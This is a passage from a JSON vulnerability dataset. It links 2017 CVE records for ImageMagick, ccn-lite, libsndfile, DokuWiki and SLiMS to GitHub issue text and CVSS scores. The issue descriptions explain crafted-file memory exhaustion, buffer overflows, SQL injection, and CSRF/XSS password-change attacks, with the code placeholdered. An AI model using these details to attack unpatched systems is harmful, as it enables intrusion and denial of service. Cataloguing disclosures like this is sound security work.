  7187. "baseScore": 7.5,
  7188. "impactScore": 3.6,
  7189. "exploitabilityScore": 3.9
  7190. },
  7191. {
  7192. "CVE_ID": "CVE-2017-12425",
  7193. "Issue_Url_old": "https://github.com/varnishcache/varnish-cache/issues/2379",
  7194. "Issue_Url_new": "https://github.com/varnishcache/varnish-cache/issues/2379",
  7195. "Repo_new": "varnishcache/varnish-cache",
  7196. "Issue_Created_At": "2017-07-31T08:10:57Z",
  7197. "description": "Placeholder issue please do not touch.",
  7198. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7199. "severity": "HIGH",
  7200. "baseScore": 7.5,
  7201. "impactScore": 3.6,
  7202. "exploitabilityScore": 3.9
  7203. },
  7204. {
  7205. "CVE_ID": "CVE-2017-12427",
  7206. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/636",
  7207. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/636",
  7208. "Repo_new": "imagemagick/imagemagick",
  7209. "Issue_Created_At": "2017-07-31T12:54:49Z",
  7210. "description": "Memory leaks in APITAG poc_link: FILETAG Trigger Command\uff1a APITAG ERRORTAG",
  7211. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7212. "severity": "MEDIUM",
  7213. "baseScore": 6.5,
  7214. "impactScore": 3.6,
  7215. "exploitabilityScore": 2.8
  7216. },
  7217. {
  7218. "CVE_ID": "CVE-2017-12428",
  7219. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/544",
  7220. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/544",
  7221. "Repo_new": "imagemagick/imagemagick",
  7222. "Issue_Created_At": "2017-07-06T05:33:05Z",
  7223. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The function\u00a0 APITAG in draw.c allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase\uff1a URLTAG APITAG of Venustech",
  7224. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7225. "severity": "HIGH",
  7226. "baseScore": 7.5,
  7227. "impactScore": 3.6,
  7228. "exploitabilityScore": 3.9
  7229. },
  7230. {
  7231. "CVE_ID": "CVE-2017-12429",
  7232. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/545",
  7233. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/545",
  7234. "Repo_new": "imagemagick/imagemagick",
  7235. "Issue_Created_At": "2017-07-06T08:25:31Z",
  7236. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify MIFF file , imagemagick will allocate memory to store the data, here is the critical code: APITAG , in function APITAG ERRORTAG The \"colors\" can be obtained from local value \"options\" as follow, and the options is controlled by image , in other words the \u201ccolors\" can be read from input file. ERRORTAG The function APITAG converts a string to unsigned long type, but the return value was not checked. Here is my FILETAG to limit memory usage, but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit APITAG of Venustech",
  7237. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7238. "severity": "HIGH",
  7239. "baseScore": 7.5,
  7240. "impactScore": 3.6,
  7241. "exploitabilityScore": 3.9
  7242. },
  7243. {
  7244. "CVE_ID": "CVE-2017-12430",
  7245. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/546",
  7246. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/546",
  7247. "Repo_new": "imagemagick/imagemagick",
  7248. "Issue_Created_At": "2017-07-06T08:47:57Z",
  7249. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify MPC file , imagemagick will allocate memory to store the data, here is the critical code: APITAG , in function APITAG APITAG The \u201cimage >colors\" can be obtained from local value \u201coptions\u201d as follow, and the options is controlled by image , in other words the \u201cimage >colors\" can be read from input file. ERRORTAG The function APITAG converts a string to unsigned long type, but the return value was not checked. Here is my FILETAG to limit memory usage, but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit APITAG of Venustech",
  7250. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7251. "severity": "HIGH",
  7252. "baseScore": 7.5,
  7253. "impactScore": 3.6,
  7254. "exploitabilityScore": 3.9
  7255. },
  7256. {
  7257. "CVE_ID": "CVE-2017-12431",
  7258. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/555",
  7259. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/555",
  7260. "Repo_new": "imagemagick/imagemagick",
  7261. "Issue_Created_At": "2017-07-09T10:38:14Z",
  7262. "description": "use after free in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify WMF file , a crafted file revealed a use after free vulnerability. A piece of memory was allocated in function APITAG APITAG Free:(api.c, in function wmf_lite_destory ) APITAG Use after free: (wmf.c, in function APITAG APITAG testcase: URLTAG Credit: APITAG of Venustech",
  7263. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7264. "severity": "MEDIUM",
  7265. "baseScore": 6.5,
  7266. "impactScore": 3.6,
  7267. "exploitabilityScore": 2.8
  7268. },
  7269. {
  7270. "CVE_ID": "CVE-2017-12432",
  7271. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/536",
  7272. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/536",
  7273. "Repo_new": "imagemagick/imagemagick",
  7274. "Issue_Created_At": "2017-07-04T14:29:43Z",
  7275. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify PCX file , imagemagick will allocate memory to store the data. Here is the critical code: APITAG pcx_packets can be controlled as follow: APITAG APITAG can be read from input file ERRORTAG Here is my FILETAG to limit memory usage, but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit : APITAG of Venustech",
  7276. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7277. "severity": "MEDIUM",
  7278. "baseScore": 6.5,
  7279. "impactScore": 3.6,
  7280. "exploitabilityScore": 2.8
  7281. },
  7282. {
  7283. "CVE_ID": "CVE-2017-12433",
  7284. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/548",
  7285. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/548",
  7286. "Repo_new": "imagemagick/imagemagick",
  7287. "Issue_Created_At": "2017-07-07T08:25:15Z",
  7288. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The function APITAG in memory.c allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: URLTAG Credit : APITAG of Venustech",
  7289. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7290. "severity": "MEDIUM",
  7291. "baseScore": 6.5,
  7292. "impactScore": 3.6,
  7293. "exploitabilityScore": 2.8
  7294. },
  7295. {
  7296. "CVE_ID": "CVE-2017-12434",
  7297. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/547",
  7298. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/547",
  7299. "Repo_new": "imagemagick/imagemagick",
  7300. "Issue_Created_At": "2017-07-06T11:50:17Z",
  7301. "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. CODETAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  7302. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7303. "severity": "MEDIUM",
  7304. "baseScore": 6.5,
  7305. "impactScore": 3.6,
  7306. "exploitabilityScore": 2.8
  7307. },
  7308. {
  7309. "CVE_ID": "CVE-2017-12435",
  7310. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/543",
  7311. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/543",
  7312. "Repo_new": "imagemagick/imagemagick",
  7313. "Issue_Created_At": "2017-07-05T16:49:29Z",
  7314. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify SUN file , imagemagick will allocate memory to store the data, here is the critical code: sun.c , in function APITAG ERRORTAG colormap.c , in function APITAG APITAG memory.c in function APITAG size_t count,const size_t quantum): APITAG APITAG is the same as malloc. image >colors can be controlled by struct APITAG value \"sun_info\", and sun_info is read from APITAG as follow, in other words image >colors can be read from input file. CODETAG Here is my FILETAG to limit memory usage, but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit: APITAG of Venustech",
  7315. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7316. "severity": "HIGH",
  7317. "baseScore": 7.5,
  7318. "impactScore": 3.6,
  7319. "exploitabilityScore": 3.9
  7320. },
  7321. {
  7322. "CVE_ID": "CVE-2017-12463",
  7323. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/129",
  7324. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/129",
  7325. "Repo_new": "cn-uofbasel/ccn-lite",
  7326. "Issue_Created_At": "2017-08-07T18:01:55Z",
  7327. "description": "[ CVETAG ] ccnl APITAG Memory Leak. struct envelope_s env leaks memory, if packet format is unknown.",
  7328. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7329. "severity": "HIGH",
  7330. "baseScore": 7.5,
  7331. "impactScore": 3.6,
  7332. "exploitabilityScore": 3.9
  7333. },
  7334. {
  7335. "CVE_ID": "CVE-2017-12464",
  7336. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/130",
  7337. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/130",
  7338. "Repo_new": "cn-uofbasel/ccn-lite",
  7339. "Issue_Created_At": "2017-08-07T18:03:51Z",
  7340. "description": "[ CVETAG ] A NULL pointer deref in ccn lite valid.c. A NULL pointer deref in ccn lite valid.c keys = load_keys_from_file(keyfile); keyfile might be NULL, when not specified on the cmdline",
  7341. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7342. "severity": "HIGH",
  7343. "baseScore": 7.5,
  7344. "impactScore": 3.6,
  7345. "exploitabilityScore": 3.9
  7346. },
  7347. {
  7348. "CVE_ID": "CVE-2017-12465",
  7349. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/131",
  7350. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/131",
  7351. "Repo_new": "cn-uofbasel/ccn-lite",
  7352. "Issue_Created_At": "2017-08-07T18:08:47Z",
  7353. "description": "APITAG CVETAG ] iottlv_parse_sequence and localrpc_parse: integer overflow. int localrpc_parse(int lev, unsigned char base, unsigned char buf, int len, int rawxml, FILE out) { int typ, vallen, i; unsigned char cp; the typ, vallen and i want to be unsigned as well, otherwise the APITAG in the LRPC_FLATNAME will run amok APITAG iottlv_parse_sequence(int lev, unsigned char ctx, unsigned char base, unsigned char buf, int len, char cur_tag, int rawxml, FILE out) { int i, vallen; vallen wants to be unsigned, better size_t ...",
  7354. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7355. "severity": "CRITICAL",
  7356. "baseScore": 9.8,
  7357. "impactScore": 5.9,
  7358. "exploitabilityScore": 3.9
  7359. },
  7360. {
  7361. "CVE_ID": "CVE-2017-12466",
  7362. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/132",
  7363. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/132",
  7364. "Repo_new": "cn-uofbasel/ccn-lite",
  7365. "Issue_Created_At": "2017-08-07T18:21:29Z",
  7366. "description": "[ CVETAG ] ssl_halen is NUMBERTAG for me, when running ccn lite simu which causes an out of bounds NUMBERTAG b NUMBERTAG in ll2ascii PATHTAG NUMBERTAG b NUMBERTAG in ccnl_addr2ascii PATHTAG NUMBERTAG bce NUMBERTAG in ccnl_get_face_or_create PATHTAG NUMBERTAG f NUMBERTAG in ccnl_simu_add_fwd PATHTAG NUMBERTAG f2fc8 in ccnl_simu_init PATHTAG NUMBERTAG dfa in ccnl_simu_init PATHTAG NUMBERTAG dfa in main PATHTAG NUMBERTAG f6d NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG PATHTAG )",
  7367. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7368. "severity": "CRITICAL",
  7369. "baseScore": 9.8,
  7370. "impactScore": 5.9,
  7371. "exploitabilityScore": 3.9
  7372. },
  7373. {
  7374. "CVE_ID": "CVE-2017-12467",
  7375. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/133",
  7376. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/133",
  7377. "Repo_new": "cn-uofbasel/ccn-lite",
  7378. "Issue_Created_At": "2017-08-07T18:24:06Z",
  7379. "description": "[ CVETAG ] memory leak. p >comp = (unsigned char ) APITAG sizeof(unsigned char )); p >complen = (int ) APITAG sizeof(int)); if (!p >comp || !p >complen) return NULL; when one of the allocations fails, the memory for the other variable leaks",
  7380. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7381. "severity": "HIGH",
  7382. "baseScore": 7.5,
  7383. "impactScore": 3.6,
  7384. "exploitabilityScore": 3.9
  7385. },
  7386. {
  7387. "CVE_ID": "CVE-2017-12468",
  7388. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/134",
  7389. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/134",
  7390. "Repo_new": "cn-uofbasel/ccn-lite",
  7391. "Issue_Created_At": "2017-08-07T18:30:38Z",
  7392. "description": "[ CVETAG ] ccn lite ccnb2xml.c: Buffer Overflow. oid print_blob(unsigned char buf, int len, int typ, int num, int offset, bool APITAG { int vallen; unsigned char valptr; if APITAG print_tag(offset, typ, num, true, false); ccnl_ccnb_consume(typ, num, buf, len, &valptr, &vallen); if (vallen > len) { return; } vallen > len is not checked",
  7393. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7394. "severity": "CRITICAL",
  7395. "baseScore": 9.8,
  7396. "impactScore": 5.9,
  7397. "exploitabilityScore": 3.9
  7398. },
  7399. {
  7400. "CVE_ID": "CVE-2017-12469",
  7401. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/135",
  7402. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/135",
  7403. "Repo_new": "cn-uofbasel/ccn-lite",
  7404. "Issue_Created_At": "2017-08-07T18:33:21Z",
  7405. "description": "[ CVETAG ] util/ccnl common.c: write in unallocated memory. util/ccnl common.c: if (key && keylen NUMBERTAG struct key_s k = (struct key_s ) calloc NUMBERTAG sizeof(struct key_s )); the APITAG only allocates the size for a pointer, not for the entire struct, causing writes to unallocated memory",
  7406. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7407. "severity": "CRITICAL",
  7408. "baseScore": 9.8,
  7409. "impactScore": 5.9,
  7410. "exploitabilityScore": 3.9
  7411. },
  7412. {
  7413. "CVE_ID": "CVE-2017-12470",
  7414. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/136",
  7415. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/136",
  7416. "Repo_new": "cn-uofbasel/ccn-lite",
  7417. "Issue_Created_At": "2017-08-07T18:36:20Z",
  7418. "description": "[ CVETAG ] ndn_parse_sequence: integer overflow. static int ndn_parse_sequence(int lev, unsigned char base, unsigned char buf, int len, char cur_tag, int rawxml, FILE out) { int i, maxi, vallen; int typ; typ should be unsigned, otherwise the check below fails: if (typ < NDN_TLV_MAX_TYPE && ndntlv_recurse[typ]) { len = vallen; vallen wants to be unsigned as well, or better size_t",
  7419. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7420. "severity": "CRITICAL",
  7421. "baseScore": 9.8,
  7422. "impactScore": 5.9,
  7423. "exploitabilityScore": 3.9
  7424. },
  7425. {
  7426. "CVE_ID": "CVE-2017-12471",
  7427. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/137",
  7428. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/137",
  7429. "Repo_new": "cn-uofbasel/ccn-lite",
  7430. "Issue_Created_At": "2017-08-07T18:41:36Z",
  7431. "description": "[ CVETAG ] ccn lite pktdump. APITAG does not check for out of bounds conditions, causing an invalid read in APITAG while APITAG base, buf, len, &num, &typ, rawxml, out NUMBERTAG if (num > len) return NUMBERTAG",
  7432. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7433. "severity": "CRITICAL",
  7434. "baseScore": 9.8,
  7435. "impactScore": 5.9,
  7436. "exploitabilityScore": 3.9
  7437. },
  7438. {
  7439. "CVE_ID": "CVE-2017-12472",
  7440. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/138",
  7441. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/138",
  7442. "Repo_new": "cn-uofbasel/ccn-lite",
  7443. "Issue_Created_At": "2017-08-07T18:43:58Z",
  7444. "description": "[ CVETAG ] ccnl ext mgmt.c Missing NULL pointer checks after APITAG which is defined to a libc APITAG Missing NULL pointer checks after APITAG which is defined to a libc APITAG src/ccnl ext mgmt.c: interfaceaddr = (char )ccnl_malloc(num_interfaces sizeof(char )); src/ccnl ext mgmt.c for(it NUMBERTAG it APITAG complen = (int ) ccnl_malloc(sizeof(int NUMBERTAG src/ccnl ext mgmt.c prefix_a >complen NUMBERTAG strlen(\"mgmt\"); src/ccnl ext mgmt.c: prefix_a >comp = (unsigned char ) ccnl_malloc(sizeof(unsigned char NUMBERTAG src/ccnl ext mgmt.c prefix_a >comp NUMBERTAG unsigned char )\"mgmt\"; src/ccnl ext nfnops.c: h = ccnl_malloc(sizeof(int)); src/ccnl ext nfnops.c h = i2 i1; src/ccnl ext nfnops.c: cp = APITAG src/ccnl ext nfnops.c strcpy(cp, pending); src/ccnl ext nfnkrivine.c: resolveterm = APITAG src/ccnl ext nfnkrivine.c sprintf(resolveterm, \"RESOLVENAME(%s)\", lambda_expr); src/ccnl ext nfnkrivine.c: int integer = ccnl_malloc(sizeof(int)); src/ccnl ext nfnkrivine.c integer = strtol((char )c >pkt >content NUMBERTAG src/ccnl core util.c: prefix >chunknum = (int ) ccnl_malloc(sizeof(int)); src/ccnl core util.c prefix >chunknum = chunknum; src/ccnl uapi.c: name = (char ) ccnl_malloc (sizeof(char) (strlen(d_obj >name NUMBERTAG src/ccnl uapi.c strncpy (name, d_obj >name, (strlen(d_obj >name NUMBERTAG because APITAG modifies the first arg ...etc, these are just _some_ examples",
  7445. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7446. "severity": "CRITICAL",
  7447. "baseScore": 9.8,
  7448. "impactScore": 5.9,
  7449. "exploitabilityScore": 3.9
  7450. },
  7451. {
  7452. "CVE_ID": "CVE-2017-12473",
  7453. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/139",
  7454. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/139",
  7455. "Repo_new": "cn-uofbasel/ccn-lite",
  7456. "Issue_Created_At": "2017-08-07T18:45:07Z",
  7457. "description": "APITAG CVETAG ]: ccnl_ccntlv_bytes2pkt program crash. ccnl_ccntlv_bytes2pkt: this parsing is not safe for all input data needs more bound checks, as some packets with wrong L values can bring this to crash line NUMBERTAG and NUMBERTAG",
  7458. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7459. "severity": "HIGH",
  7460. "baseScore": 7.5,
  7461. "impactScore": 3.6,
  7462. "exploitabilityScore": 3.9
  7463. },
  7464. {
  7465. "CVE_ID": "CVE-2017-12562",
  7466. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/292",
  7467. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/292",
  7468. "Repo_new": "libsndfile/libsndfile",
  7469. "Issue_Created_At": "2017-06-14T10:23:06Z",
  7470. "description": "Heap buffer overflows in APITAG in NUMBERTAG and later NUMBERTAG Case APITAG only enlarges the buffer by APITAG bytes instead of size bytes. This issue had originally reported by funute against openmpt NUMBERTAG see CVETAG ). openmpt NUMBERTAG uses libsndfile to write WAV files and can output large amounts of string data in the APITAG metadata field. Valgrind stacktrace (libsndfile NUMBERTAG ERRORTAG Test case in bug1.c (tested on Ubuntu NUMBERTAG with libsndfile NUMBERTAG ERRORTAG ERRORTAG NUMBERTAG APITAG in APITAG enlarges the header buffer (if needed) prior to the big switch statement by an amount NUMBERTAG bytes) which is enough for all cases where only a single value gets added. Cases APITAG , APITAG , APITAG however additionally write an arbitrary length block of data and again enlarge the buffer to the required amount. However, the required space calculation does not take into account the size of the length field which gets output before the data. Test case bug2.c (tested on Ubuntu NUMBERTAG with libsndfile NUMBERTAG with APITAG replaced by size in the buffer size calculation): ERRORTAG ERRORTAG NUMBERTAG Buffer size requirement calculation in case APITAG does not account for the padding byte ( APITAG happens after the calculation which uses size NUMBERTAG Case APITAG can overrun the header buffer by NUMBERTAG byte when no padding is involved ( APITAG while the buffer is only guaranteed to have size space available NUMBERTAG APITAG in case APITAG always writes NUMBERTAG byte beyond the space which is guaranteed to be allocated in the header buffer NUMBERTAG Case APITAG can overrun the provided source string by NUMBERTAG byte if padding is envolved ( APITAG where size is APITAG (which includes the NUMBERTAG terminator, plus optionally another APITAG which is padding and not guaranteed to be readable via the source string pointer). 
I have not yet invested the time to provide reproducable tests for NUMBERTAG to NUMBERTAG require hitting the header buffer end exactly which might not even be possible with NUMBERTAG byte alignment and the buffer enlargment being also NUMBERTAG byte aligned (I did not investigate this further, triggering might require an odd APITAG constant and/or a growing factor other than APITAG ). I would consider the current code to at least be fragile nonetheless NUMBERTAG is difficult to even catch with valgrind or similar tools because the source strings are layed out in one big buffer contiguously ( APITAG ) which makes it impossible for memory checkers to detect buffer overruns inside that buffer. Pull request with fixes will follow.",
  7471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7472. "severity": "CRITICAL",
  7473. "baseScore": 9.8,
  7474. "impactScore": 5.9,
  7475. "exploitabilityScore": 3.9
  7476. },
  7477. {
  7478. "CVE_ID": "CVE-2017-12563",
  7479. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/599",
  7480. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/599",
  7481. "Repo_new": "imagemagick/imagemagick",
  7482. "Issue_Created_At": "2017-07-23T13:57:14Z",
  7483. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify PSD file , imagemagick will allocate memory to store the data, here is the critical code: psd.c , in function APITAG ERRORTAG length can be read from image,that is to say it can be controlled by input file. APITAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit : APITAG of Venustech",
  7484. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7485. "severity": "MEDIUM",
  7486. "baseScore": 6.5,
  7487. "impactScore": 3.6,
  7488. "exploitabilityScore": 2.8
  7489. },
  7490. {
  7491. "CVE_ID": "CVE-2017-12564",
  7492. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/601",
  7493. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/601",
  7494. "Repo_new": "imagemagick/imagemagick",
  7495. "Issue_Created_At": "2017-07-23T14:01:17Z",
  7496. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  7497. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7498. "severity": "MEDIUM",
  7499. "baseScore": 6.5,
  7500. "impactScore": 3.6,
  7501. "exploitabilityScore": 2.8
  7502. },
  7503. {
  7504. "CVE_ID": "CVE-2017-12565",
  7505. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/602",
  7506. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/602",
  7507. "Repo_new": "imagemagick/imagemagick",
  7508. "Issue_Created_At": "2017-07-23T14:03:16Z",
  7509. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  7510. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7511. "severity": "MEDIUM",
  7512. "baseScore": 6.5,
  7513. "impactScore": 3.6,
  7514. "exploitabilityScore": 2.8
  7515. },
  7516. {
  7517. "CVE_ID": "CVE-2017-12566",
  7518. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/603",
  7519. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/603",
  7520. "Repo_new": "imagemagick/imagemagick",
  7521. "Issue_Created_At": "2017-07-23T14:04:38Z",
  7522. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  7523. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7524. "severity": "MEDIUM",
  7525. "baseScore": 6.5,
  7526. "impactScore": 3.6,
  7527. "exploitabilityScore": 2.8
  7528. },
  7529. {
  7530. "CVE_ID": "CVE-2017-12583",
  7531. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2061",
  7532. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2061",
  7533. "Repo_new": "dokuwiki/dokuwiki",
  7534. "Issue_Created_At": "2017-08-01T04:15:21Z",
  7535. "description": "APITAG Refected XSS in FILETAG . Bug Field at is not sanitized in msg error message. It's a reflected XSS. Detail APITAG ERRORTAG APITAG APITAG",
  7536. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  7537. "severity": "MEDIUM",
  7538. "baseScore": 6.1,
  7539. "impactScore": 2.7,
  7540. "exploitabilityScore": 2.8
  7541. },
  7542. {
  7543. "CVE_ID": "CVE-2017-12584",
  7544. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/49",
  7545. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/49",
  7546. "Repo_new": "slims/slims8_akasia",
  7547. "Issue_Created_At": "2017-05-26T12:26:07Z",
  7548. "description": "Security Bugs] CSRF + XSS in Change User Profile. In Change User Profile function, there is no Old password to confirm change user password, and also no CSRF Token to protect CSRF malicious request. APITAG Owasp URLTAG . So when the admin user access to malicious web, it will trigger to automatically change admin password to attacker's password. Example request: URLTAG CODETAG This will change admin password to trichimtrich And also, there is a stored XSS in here too. All the field APITAG , APITAG , APITAG have the same problem. Sample request: APITAG APITAG APITAG APITAG Attacker can trigger admin to execute abitrary javascript to do anything.",
  7549. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7550. "severity": "HIGH",
  7551. "baseScore": 8.8,
  7552. "impactScore": 5.9,
  7553. "exploitabilityScore": 2.8
  7554. },
  7555. {
  7556. "CVE_ID": "CVE-2017-12585",
  7557. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/47",
  7558. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/47",
  7559. "Repo_new": "slims/slims8_akasia",
  7560. "Issue_Created_At": "2017-05-25T20:01:39Z",
  7561. "description": "FILETAG So if my POST variable APITAG will trigger sql injection if not contains these chars. Example: ERRORTAG FILETAG And also CODETAG Variable APITAG does not sanitize for sql query yet. So it'll trigger injection like this FILETAG These NUMBERTAG urls have the same problems FILETAG FILETAG This bug is excutable by everyone who has librarian role (single).",
  7562. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  7563. "severity": "HIGH",
  7564. "baseScore": 8.8,
  7565. "impactScore": 5.9,
  7566. "exploitabilityScore": 2.8
  7567. },
  7568. {
  7569. "CVE_ID": "CVE-2017-12586",
  7570. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/48",
  7571. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/48",
  7572. "Repo_new": "slims/slims8_akasia",
  7573. "Issue_Created_At": "2017-05-25T20:06:38Z",
  7574. "description": "FILETAG",
  7575. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  7576. "severity": "MEDIUM",
  7577. "baseScore": 6.5,
  7578. "impactScore": 3.6,
  7579. "exploitabilityScore": 2.8
  7580. },
  7581. {
  7582. "CVE_ID": "CVE-2017-12587",
  7583. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/535",
